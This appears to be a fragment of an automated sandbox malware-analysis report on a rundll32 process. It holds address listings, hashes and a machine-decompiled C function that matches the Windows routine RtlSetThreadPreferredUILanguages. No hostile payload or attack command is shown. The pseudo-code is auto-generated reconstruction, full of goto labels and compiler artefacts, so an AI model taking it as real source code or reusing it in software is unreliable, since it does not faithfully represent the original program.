                                                                                                                0x04475b15
                                                                                                                0x04475b17
                                                                                                                0x00000000
                                                                                                                0x044326b8
                                                                                                                0x044326b8
                                                                                                                0x044326ba
                                                                                                                0x044327a6
                                                                                                                0x044327a6
                                                                                                                0x044327a9
                                                                                                                0x044327ab
                                                                                                                0x044327b9
                                                                                                                0x044327b9
                                                                                                                0x044327be
                                                                                                                0x044327c1
                                                                                                                0x044327c3
                                                                                                                0x044327c5
                                                                                                                0x044327c7
                                                                                                                0x04475c74
                                                                                                                0x04475c79
                                                                                                                0x04475c79
                                                                                                                0x044327c7
                                                                                                                0x00000000
                                                                                                                0x044326c0
                                                                                                                0x044326c0
                                                                                                                0x044326c3
                                                                                                                0x044326c6
                                                                                                                0x044326c6
                                                                                                                0x044326c9
                                                                                                                0x044326c9
                                                                                                                0x00000000
                                                                                                                0x044326c9
                                                                                                                0x044326ba
                                                                                                                0x0443265b
                                                                                                                0x0443265b
                                                                                                                0x0443265e
                                                                                                                0x04432667
                                                                                                                0x0443266d
                                                                                                                0x04432677
                                                                                                                0x0443267c
                                                                                                                0x0443267f
                                                                                                                0x04432681
                                                                                                                0x04475b49
                                                                                                                0x04475b4e
                                                                                                                0x044327cd
                                                                                                                0x044327d0
                                                                                                                0x044327d1
                                                                                                                0x044327d2
                                                                                                                0x044327d4
                                                                                                                0x044327dd
                                                                                                                0x04432687
                                                                                                                0x04432687
                                                                                                                0x0443268a
                                                                                                                0x0443268b
                                                                                                                0x0443268e
                                                                                                                0x0443268f
                                                                                                                0x04432691
                                                                                                                0x04432696
                                                                                                                0x04432698
                                                                                                                0x0443269d
                                                                                                                0x0443269f
                                                                                                                0x00000000
                                                                                                                0x0443269f
                                                                                                                0x04432681
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432846
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432605
                                                                                                                0x0443260a
                                                                                                                0x0443260c
                                                                                                                0x04432611
                                                                                                                0x04432616
                                                                                                                0x04432619
                                                                                                                0x04432619
                                                                                                                0x0443261e
                                                                                                                0x00000000
                                                                                                                0x04432624
                                                                                                                0x04432627
                                                                                                                0x04432627
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475b1f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432894
                                                                                                                0x0443289b
                                                                                                                0x0443289d
                                                                                                                0x044328a1
                                                                                                                0x04475b2b
                                                                                                                0x04475b2e
                                                                                                                0x04475b2e
                                                                                                                0x044328a7
                                                                                                                0x044328a9
                                                                                                                0x04475b04
                                                                                                                0x04475b09
                                                                                                                0x04475b09
                                                                                                                0x04475b09
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475b35
                                                                                                                0x04475b3c
                                                                                                                0x044328fb
                                                                                                                0x044328fb
                                                                                                                0x044326cc
                                                                                                                0x044326cc
                                                                                                                0x044326d0
                                                                                                                0x00000000
                                                                                                                0x044326d2
                                                                                                                0x044326d2
                                                                                                                0x00000000
                                                                                                                0x044326d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044325fe
                                                                                                                0x0443292d
                                                                                                                0x04432930
                                                                                                                0x04432935
                                                                                                                0x04432937
                                                                                                                0x04432938
                                                                                                                0x0443293a
                                                                                                                0x0443293d
                                                                                                                0x04432944
                                                                                                                0x04432946
                                                                                                                0x0443294e
                                                                                                                0x04432950
                                                                                                                0x04432952
                                                                                                                0x04432955
                                                                                                                0x0443295a
                                                                                                                0x0443295d
                                                                                                                0x04432962
                                                                                                                0x04432963
                                                                                                                0x04432964
                                                                                                                0x04432966
                                                                                                                0x04432969
                                                                                                                0x0443296a
                                                                                                                0x0443296e
                                                                                                                0x04432972
                                                                                                                0x04432976
                                                                                                                0x0443297b
                                                                                                                0x0443297e
                                                                                                                0x0443297f
                                                                                                                0x04432980
                                                                                                                0x04432981
                                                                                                                0x04432982
                                                                                                                0x04432983
                                                                                                                0x04432984
                                                                                                                0x04432985
                                                                                                                0x04432986
                                                                                                                0x04432987
                                                                                                                0x04432988
                                                                                                                0x04432989
                                                                                                                0x0443298a
                                                                                                                0x0443298b
                                                                                                                0x0443298c
                                                                                                                0x0443298d
                                                                                                                0x0443298e
                                                                                                                0x0443298f
                                                                                                                0x04432990
                                                                                                                0x04432992
                                                                                                                0x04432997
                                                                                                                0x044329a3
                                                                                                                0x044329a6
                                                                                                                0x044329ab
                                                                                                                0x044329ad
                                                                                                                0x044329b0
                                                                                                                0x044329b2
                                                                                                                0x04475c80
                                                                                                                0x044329b8
                                                                                                                0x044329b8
                                                                                                                0x044329bb
                                                                                                                0x044329c0
                                                                                                                0x044329c5
                                                                                                                0x044329c6
                                                                                                                0x044329c6
                                                                                                                0x044329c9
                                                                                                                0x044329cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044329cd
                                                                                                                0x044329d0
                                                                                                                0x044329d9
                                                                                                                0x044329db
                                                                                                                0x044329dd
                                                                                                                0x04432a7f
                                                                                                                0x04432a84
                                                                                                                0x04432a87
                                                                                                                0x04432a89
                                                                                                                0x04475ca1
                                                                                                                0x04475ca3
                                                                                                                0x00000000
                                                                                                                0x04432a8f
                                                                                                                0x04432a8f
                                                                                                                0x00000000
                                                                                                                0x04432a8f
                                                                                                                0x00000000
                                                                                                                0x044329e3
                                                                                                                0x044329e3
                                                                                                                0x044329e3
                                                                                                                0x00000000
                                                                                                                0x044329e3
                                                                                                                0x044329dd
                                                                                                                0x00000000
                                                                                                                0x044329db
                                                                                                                0x044329e6
                                                                                                                0x044329e9
                                                                                                                0x044329eb
                                                                                                                0x044329ed
                                                                                                                0x044329f3
                                                                                                                0x044329f5
                                                                                                                0x044329f8
                                                                                                                0x044329fa
                                                                                                                0x04432a97
                                                                                                                0x04432a9a
                                                                                                                0x04432a9d
                                                                                                                0x04432add
                                                                                                                0x00000000
                                                                                                                0x04432a9f
                                                                                                                0x04432aa2
                                                                                                                0x04432aa5
                                                                                                                0x04432aa8
                                                                                                                0x04432aab
                                                                                                                0x04475cab
                                                                                                                0x04475caf
                                                                                                                0x04475cc5
                                                                                                                0x04475cda
                                                                                                                0x04475cdc
                                                                                                                0x04475cdf
                                                                                                                0x04475ce5
                                                                                                                0x00000000
                                                                                                                0x04475ceb
                                                                                                                0x04475ced
                                                                                                                0x04475cee
                                                                                                                0x00000000
                                                                                                                0x04475cee
                                                                                                                0x04475cb1
                                                                                                                0x04475cb4
                                                                                                                0x04475cb9
                                                                                                                0x04475cbb
                                                                                                                0x00000000
                                                                                                                0x04475cbd
                                                                                                                0x04475cbd
                                                                                                                0x00000000
                                                                                                                0x04475cbd
                                                                                                                0x04475cbb
                                                                                                                0x04432ab1
                                                                                                                0x04432ab1
                                                                                                                0x04432ac4
                                                                                                                0x04432ac6
                                                                                                                0x04432ac6
                                                                                                                0x00000000
                                                                                                                0x04432ac6
                                                                                                                0x04432aab
                                                                                                                0x00000000
                                                                                                                0x04432a00
                                                                                                                0x04432a09
                                                                                                                0x04432a0e
                                                                                                                0x04432a21
                                                                                                                0x04432a24
                                                                                                                0x04432a35
                                                                                                                0x04432a3a
                                                                                                                0x04432a3d
                                                                                                                0x04432a42
                                                                                                                0x04432a59
                                                                                                                0x04432a59
                                                                                                                0x04432a5c
                                                                                                                0x04432a5f
                                                                                                                0x04432a5f
                                                                                                                0x044329fa
                                                                                                                0x044329f3
                                                                                                                0x04432a64
                                                                                                                0x04432a64
                                                                                                                0x04432a6b
                                                                                                                0x04432a6b
                                                                                                                0x04432a6d
                                                                                                                0x04432a72
                                                                                                                0x04432a72
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PATH
                                                                                                                • API String ID: 0-1036084923
                                                                                                                • Opcode ID: 896fee79ac82fb4c2f676179dab91a01cfdef76bc3036f3439c40eb0a725c9ce
                                                                                                                • Instruction ID: 928fef6c52e57c587f0edd40b10cfd6655a0660b750b6024f1bb34b1b33c4640
                                                                                                                • Opcode Fuzzy Hash: 896fee79ac82fb4c2f676179dab91a01cfdef76bc3036f3439c40eb0a725c9ce
                                                                                                                • Instruction Fuzzy Hash: 73C18075E00219EBEF24DF99D881ABEB7B1FF48B05F14406AE501AB350E774B942CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E0443FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0441EEF0(0x44f7b60);
					_t134 =  *0x44f7b84; // 0x77e17b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x44f7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x44f7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04416D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E044176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E044A8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0440B150();
													}
													_t116 = E044A6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E044175CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x44f8638; // 0x35c188
																	_t122 = L044138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E044176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E044176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0443FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L044170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0443FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0443FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0443FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0443FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0443FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x44f7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x44f7b84 = _t75;
						_t73 = E0441EB70(_t134, 0x44f7b60);
						if( *0x44f7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0441FF60( *0x44f7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                0x0443fab0
                                                                                                                0x0443fab2
                                                                                                                0x0443fab3
                                                                                                                0x0443fab4
                                                                                                                0x0443fabc
                                                                                                                0x0443fac0
                                                                                                                0x0443fb14
                                                                                                                0x0443fb17
                                                                                                                0x0443fac2
                                                                                                                0x0443fac8
                                                                                                                0x0443facd
                                                                                                                0x0443fad3
                                                                                                                0x0443fad3
                                                                                                                0x0443fadd
                                                                                                                0x0443fb18
                                                                                                                0x0443fb1b
                                                                                                                0x0443fb1d
                                                                                                                0x0443fb1e
                                                                                                                0x0443fb1f
                                                                                                                0x0443fb20
                                                                                                                0x0443fb21
                                                                                                                0x0443fb22
                                                                                                                0x0443fb23
                                                                                                                0x0443fb24
                                                                                                                0x0443fb25
                                                                                                                0x0443fb26
                                                                                                                0x0443fb27
                                                                                                                0x0443fb28
                                                                                                                0x0443fb29
                                                                                                                0x0443fb2a
                                                                                                                0x0443fb2b
                                                                                                                0x0443fb2c
                                                                                                                0x0443fb2d
                                                                                                                0x0443fb2e
                                                                                                                0x0443fb2f
                                                                                                                0x0443fb3a
                                                                                                                0x0443fb3b
                                                                                                                0x0443fb3e
                                                                                                                0x0443fb41
                                                                                                                0x0443fb44
                                                                                                                0x0443fb47
                                                                                                                0x0443fb4a
                                                                                                                0x0443fb4d
                                                                                                                0x0443fb53
                                                                                                                0x0447bdcb
                                                                                                                0x0447bdcb
                                                                                                                0x0443fb59
                                                                                                                0x0443fb5b
                                                                                                                0x0443fb5b
                                                                                                                0x0443fb5e
                                                                                                                0x0447bdd5
                                                                                                                0x0447bdd8
                                                                                                                0x00000000
                                                                                                                0x0447bdda
                                                                                                                0x00000000
                                                                                                                0x0447bdda
                                                                                                                0x0443fb64
                                                                                                                0x0443fb64
                                                                                                                0x0443fb64
                                                                                                                0x0443fb67
                                                                                                                0x0443fb6e
                                                                                                                0x0443fb70
                                                                                                                0x0443fb72
                                                                                                                0x00000000
                                                                                                                0x0443fb78
                                                                                                                0x0443fb7a
                                                                                                                0x0443fb7a
                                                                                                                0x0443fb7d
                                                                                                                0x0443fb80
                                                                                                                0x0447bddf
                                                                                                                0x0447bde1
                                                                                                                0x00000000
                                                                                                                0x0447bde3
                                                                                                                0x00000000
                                                                                                                0x0447bde3
                                                                                                                0x0443fb86
                                                                                                                0x0443fb86
                                                                                                                0x0443fb86
                                                                                                                0x0443fb8b
                                                                                                                0x0443fb90
                                                                                                                0x0443fb92
                                                                                                                0x0443fb94
                                                                                                                0x0443fb9a
                                                                                                                0x0443fb9b
                                                                                                                0x0443fba1
                                                                                                                0x0447bde8
                                                                                                                0x0447bdeb
                                                                                                                0x0447bded
                                                                                                                0x0447beb5
                                                                                                                0x0447beb5
                                                                                                                0x0447bebb
                                                                                                                0x0447bebd
                                                                                                                0x0447bec3
                                                                                                                0x0447bed2
                                                                                                                0x0447bedd
                                                                                                                0x0447bedd
                                                                                                                0x0447beed
                                                                                                                0x00000000
                                                                                                                0x0447bdf3
                                                                                                                0x0447bdfe
                                                                                                                0x0447be06
                                                                                                                0x0447be0b
                                                                                                                0x0447be0d
                                                                                                                0x0447be0f
                                                                                                                0x0447be14
                                                                                                                0x0447be19
                                                                                                                0x0447be20
                                                                                                                0x0447be25
                                                                                                                0x0447be27
                                                                                                                0x0447be35
                                                                                                                0x0447be39
                                                                                                                0x0447be46
                                                                                                                0x0447be4f
                                                                                                                0x0447be54
                                                                                                                0x0447be56
                                                                                                                0x0447bef8
                                                                                                                0x0447bef8
                                                                                                                0x00000000
                                                                                                                0x0447be5c
                                                                                                                0x0447be5c
                                                                                                                0x0447be60
                                                                                                                0x00000000
                                                                                                                0x0447be66
                                                                                                                0x0447be66
                                                                                                                0x0447be7f
                                                                                                                0x0447be84
                                                                                                                0x0447be87
                                                                                                                0x0447be89
                                                                                                                0x0447be8b
                                                                                                                0x0447be99
                                                                                                                0x0447be9d
                                                                                                                0x0447bea0
                                                                                                                0x0447beac
                                                                                                                0x0447beaf
                                                                                                                0x0447beb1
                                                                                                                0x0447beb3
                                                                                                                0x0447beb3
                                                                                                                0x00000000
                                                                                                                0x0447bea2
                                                                                                                0x0447bea2
                                                                                                                0x00000000
                                                                                                                0x0447bea2
                                                                                                                0x0447be8d
                                                                                                                0x0447be8d
                                                                                                                0x0447be92
                                                                                                                0x00000000
                                                                                                                0x0447be92
                                                                                                                0x0447be8b
                                                                                                                0x0447be60
                                                                                                                0x0447be3b
                                                                                                                0x0447be3b
                                                                                                                0x0447be3e
                                                                                                                0x00000000
                                                                                                                0x0447be40
                                                                                                                0x0447be40
                                                                                                                0x0447be44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447be44
                                                                                                                0x0447be3e
                                                                                                                0x0447be29
                                                                                                                0x0447be29
                                                                                                                0x00000000
                                                                                                                0x0447be29
                                                                                                                0x0447be27
                                                                                                                0x00000000
                                                                                                                0x0443fba7
                                                                                                                0x0443fba7
                                                                                                                0x0443fbab
                                                                                                                0x0447bf02
                                                                                                                0x0443fbb1
                                                                                                                0x0443fbb1
                                                                                                                0x0443fbb8
                                                                                                                0x0443fbbd
                                                                                                                0x0443fbbd
                                                                                                                0x0443fbbf
                                                                                                                0x0443fbbf
                                                                                                                0x0443fbc5
                                                                                                                0x0443fbcb
                                                                                                                0x0443fbf8
                                                                                                                0x0443fbf8
                                                                                                                0x0443fbfa
                                                                                                                0x00000000
                                                                                                                0x0443fc00
                                                                                                                0x0443fc00
                                                                                                                0x0443fc03
                                                                                                                0x00000000
                                                                                                                0x0443fc09
                                                                                                                0x0443fc09
                                                                                                                0x0443fc0f
                                                                                                                0x0443fc15
                                                                                                                0x0443fc23
                                                                                                                0x0443fc23
                                                                                                                0x0443fc25
                                                                                                                0x0443fc27
                                                                                                                0x0443fc75
                                                                                                                0x0443fc7c
                                                                                                                0x0443fc84
                                                                                                                0x00000000
                                                                                                                0x0443fc29
                                                                                                                0x0443fc29
                                                                                                                0x0443fc2d
                                                                                                                0x0443fc30
                                                                                                                0x0447bf0f
                                                                                                                0x00000000
                                                                                                                0x0443fc36
                                                                                                                0x0443fc38
                                                                                                                0x0443fc3b
                                                                                                                0x0443fc41
                                                                                                                0x0447bf17
                                                                                                                0x0447bf19
                                                                                                                0x0447bf48
                                                                                                                0x0447bf4b
                                                                                                                0x00000000
                                                                                                                0x0447bf1b
                                                                                                                0x0447bf22
                                                                                                                0x0447bf24
                                                                                                                0x0447bf26
                                                                                                                0x00000000
                                                                                                                0x0447bf2c
                                                                                                                0x0447bf37
                                                                                                                0x0447bf39
                                                                                                                0x0447bf3b
                                                                                                                0x00000000
                                                                                                                0x0447bf41
                                                                                                                0x0447bf41
                                                                                                                0x0447bf41
                                                                                                                0x0447bf41
                                                                                                                0x0447bf45
                                                                                                                0x00000000
                                                                                                                0x0447bf45
                                                                                                                0x0447bf3b
                                                                                                                0x0447bf26
                                                                                                                0x00000000
                                                                                                                0x0443fc47
                                                                                                                0x0443fc47
                                                                                                                0x0443fc49
                                                                                                                0x0443fcb2
                                                                                                                0x0443fcb4
                                                                                                                0x0443fcb6
                                                                                                                0x0443fcdc
                                                                                                                0x0443fcdc
                                                                                                                0x00000000
                                                                                                                0x0443fcb8
                                                                                                                0x0443fcc3
                                                                                                                0x0443fcc5
                                                                                                                0x0443fcc7
                                                                                                                0x00000000
                                                                                                                0x0443fcc9
                                                                                                                0x0443fcc9
                                                                                                                0x0443fccd
                                                                                                                0x00000000
                                                                                                                0x0443fccd
                                                                                                                0x0443fcc7
                                                                                                                0x00000000
                                                                                                                0x0443fc4b
                                                                                                                0x0443fc4b
                                                                                                                0x0443fc4e
                                                                                                                0x0443fc4e
                                                                                                                0x0443fc51
                                                                                                                0x0443fc51
                                                                                                                0x0443fc54
                                                                                                                0x0443fc5a
                                                                                                                0x0443fc5c
                                                                                                                0x0443fc5f
                                                                                                                0x0443fc61
                                                                                                                0x0443fc63
                                                                                                                0x0443fc65
                                                                                                                0x0443fc67
                                                                                                                0x0443fc6e
                                                                                                                0x0443fc72
                                                                                                                0x0443fc72
                                                                                                                0x0443fc72
                                                                                                                0x0443fc72
                                                                                                                0x0443fc67
                                                                                                                0x0443fc61
                                                                                                                0x00000000
                                                                                                                0x0443fc5a
                                                                                                                0x0443fc49
                                                                                                                0x0443fc41
                                                                                                                0x0443fc30
                                                                                                                0x0443fc27
                                                                                                                0x0443fc03
                                                                                                                0x0443fbcd
                                                                                                                0x0443fbd3
                                                                                                                0x0443fbd9
                                                                                                                0x0443fbdc
                                                                                                                0x0443fbde
                                                                                                                0x0443fc99
                                                                                                                0x0443fc9b
                                                                                                                0x0443fc9d
                                                                                                                0x0443fcd5
                                                                                                                0x0443fcd5
                                                                                                                0x0443fc89
                                                                                                                0x0443fc89
                                                                                                                0x00000000
                                                                                                                0x0443fc9f
                                                                                                                0x0443fc9f
                                                                                                                0x0443fca3
                                                                                                                0x00000000
                                                                                                                0x0443fca3
                                                                                                                0x00000000
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe4
                                                                                                                0x0443fbe9
                                                                                                                0x0443fbf2
                                                                                                                0x00000000
                                                                                                                0x0443fbf2
                                                                                                                0x0443fbde
                                                                                                                0x0443fbcb
                                                                                                                0x0443fbab
                                                                                                                0x0443fc8b
                                                                                                                0x0443fc8b
                                                                                                                0x0443fc8c
                                                                                                                0x0443fb80
                                                                                                                0x0443fb72
                                                                                                                0x0443fb5e
                                                                                                                0x0443fc8d
                                                                                                                0x0443fc91
                                                                                                                0x0443fadf
                                                                                                                0x0443fadf
                                                                                                                0x0443fae1
                                                                                                                0x0443fae4
                                                                                                                0x0443fae7
                                                                                                                0x0443faec
                                                                                                                0x0443faf8
                                                                                                                0x0443fb00
                                                                                                                0x0443fb07
                                                                                                                0x0443fb0f
                                                                                                                0x0443fb0f
                                                                                                                0x0443fb07
                                                                                                                0x00000000
                                                                                                                0x0443faf8
                                                                                                                0x0443fadd

                                                                                                                Strings
                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0447BE0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                • API String ID: 0-865735534
                                                                                                                • Opcode ID: 374afe1fee4ec1bf183cf49a57b984d272d13af64f1ef3e0eee80f6aee9524b4
                                                                                                                • Instruction ID: 7226d6103d65895179a8c4b1fc02f14d05117850c201ee70a1ba1c3df442db02
                                                                                                                • Opcode Fuzzy Hash: 374afe1fee4ec1bf183cf49a57b984d272d13af64f1ef3e0eee80f6aee9524b4
